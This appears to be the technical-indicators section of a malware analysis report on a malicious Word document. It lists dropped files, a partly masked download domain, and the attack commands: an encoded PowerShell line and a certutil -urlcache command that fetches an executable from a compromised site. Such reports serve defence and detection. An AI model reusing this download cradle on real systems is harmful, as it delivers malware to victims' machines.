Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAOgAvAC8AYgBoAGEAawB0AGkAaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbAAuAGkAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHIAZQBxAHoAbwBuA...
- <Current directory>\rz.exe
- <Current directory>\~wrd0000.tmp
- <Current directory>\~wrd0001.tmp
- <Current directory>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- 'bh#####nternational.in':80
- DNS ASK bh#####nternational.in
- '<SYSTEM32>\certutil.exe' -urlcache -f http://bh#####nternational.in/wp-admin/reqzone.exe rz.exe